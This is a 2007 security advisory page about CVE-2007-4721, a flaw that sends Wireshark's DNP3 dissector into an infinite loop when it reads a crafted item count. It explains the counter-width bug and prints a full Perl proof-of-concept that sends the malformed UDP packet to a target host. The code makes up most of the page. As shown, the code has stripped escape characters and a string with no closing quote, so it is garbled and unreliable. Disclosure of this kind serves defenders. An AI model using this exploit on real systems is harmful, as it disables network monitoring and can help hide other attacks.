|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 3095 CVE : CVE-2007-4721 SecurityRisk : Medium  (About) Remote Exploit : No Local Exploit : Yes Exploit Given : Yes Credit : Aviram Jenik Published : 07.09.2007
Advisory Text : A vulnerability in Wireshark's DNP3 dissector allows attackers to cause it to enter an infinite loop which in turn can be used to mask other types of attacks from being captured by Wireshark. DETAILS Vulnerable Systems: * Wireshark version 0.99.5 and prior Immune Systems: * Wireshark version 0.99.6 and newer A vulnerability in the way Wireshark handles DNP3 data allows an attacker to fool the dissector into thinking a negative value of items has been provided to it as part of the Application Layer's request to read/write objects. This in turn causes the loop found in the code: for (temp16 = 0; temp16 < num_items; temp16++) { To enter into an infinite loop as the temp16 parameter is defined as an unsigned int of a length of 16 bits while the num_items is defined as an unsigned int of a length of 32 bits - which in turn means than a negative value will be casted into a larger than 16 bits value - as the temp16 will not be able to reach the value stored in the num_items parameter. Proof of Concept: The vulnerability can be recreated by either using beSTORM (http://www.beyondsecurity.com/bestorm_overview.html) with the DNP3 protocol fuzzer and monitoring the traffic generated with Wireshark or by launching the following exploit code: #!/usr/bin/perl # Automatically generated by beSTORM(tm) # Copyright Beyond Security (c) 2003-2007 ($Revision: 3741 $) # Attack vector: # M0:P0:B0.BT0:B0.BT0:B0.BT0:B0.BT0 # Module: # DNP3 use strict; use warnings; use Getopt::Std; use IO::Socket::INET; $SIG{INT} = &abort; my $host = '192.168.4.52'; my $port = 20000; my $proto = 'udp'; my $sockType = SOCK_DGRAM; my $timeout = 1; #Read command line arguments my %opt; my $opt_string = 'hH:P:t:'; getopts( "$opt_string", %opt ); if (defined $opt{h}) { usage() } $host = $opt{H} ? $opt{H} : $host; $port = $opt{P} ? $opt{P} : $port; $timeout = $opt{t} ? $opt{t} : $timeout; my @commands = ( {Command => 'Send', Data => "xC3xC0x01x01x00x01x07x08x01x02x03x04x05x06x07x08}, {Command => 'Receive'}, ); ### # End user configurable part ### #1. Create a new connection my $sock = new IO::Socket::INET ( PeerAddr => $host, PeerPort => $port, Proto => $proto, Type => $sockType, Timeout => $timeout, ) or die "socket error: $!nn"; print "connected to: $host:$portn"; $sock->autoflush(1); binmode $sock; #2. communication part foreach my $command (@commands) { if ($command->{'Command'} eq 'Receive') { my $buf = receive($sock, $timeout); if (length $buf) { print "received: [$buf]n"; } } elsif ($command->{'Command'} eq 'Send') { print "sending: [".$command->{'Data'}."]n"; send ($sock, $command->{'Data'}, 0) or die "send failed, reason: $!n"; } } #3. Close connection close ($sock); #The end sub receive { my $sock = shift; my $timeout = shift; my $tmpbuf; my $buf = ""; while(1) { # Example from perldoc -f alarm eval { local $SIG{ALRM} = sub { die "timeoutn" }; alarm $timeout; my $ret = read $sock, $tmpbuf, 1; #We read data one byte at a time. if ( !defined $ret or $ret == 0 ) { #EOF die "timeoutn"; } alarm 0; $buf .= $tmpbuf; }; if ($@) { #time out if($@ eq "timeoutn") { last; } else { die "receive abortedn"; } } } #while return $buf; } sub abort { print "aborting...n"; if ($sock) { close $sock; } die "User aborted operationn"; } sub usage { print "usage: $0 [-hHPt]n"; print "-ht: this help messagen"; print "-Ht: override default host - $hostn"; print "-Pt: override default port - $portn"; print "-tt: set socket timeout in secondsn"; exit 0; } ADDITIONAL INFORMATION The information has been provided by beSTORM. More information can be found at: <http://www.beyondsecurity.com/bestorm_overview.html> http://www.beyondsecurity.com/bestorm_overview.html -- Regards, Aviram Jenik Beyond Security http://www.BeyondSecurity.com http://www.SecuriTeam.com Looking for Unknown Vulnerabilities? http://beyondsecurity.com/beSTORM  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
Multiple Vendors libc/gdtoa printf(3) Array Overrun
SecurityReason realised new advisory about vulnerabilities libc/gdtoa... |
||
| Apache |  |
|
» Apache Tomcat |
||
» Apache Tomcat User |
||
| PHP | |
|
» PHP |
||
- 2009-05-30| Copyright © SecurityReason.com. All Rights Reserved. |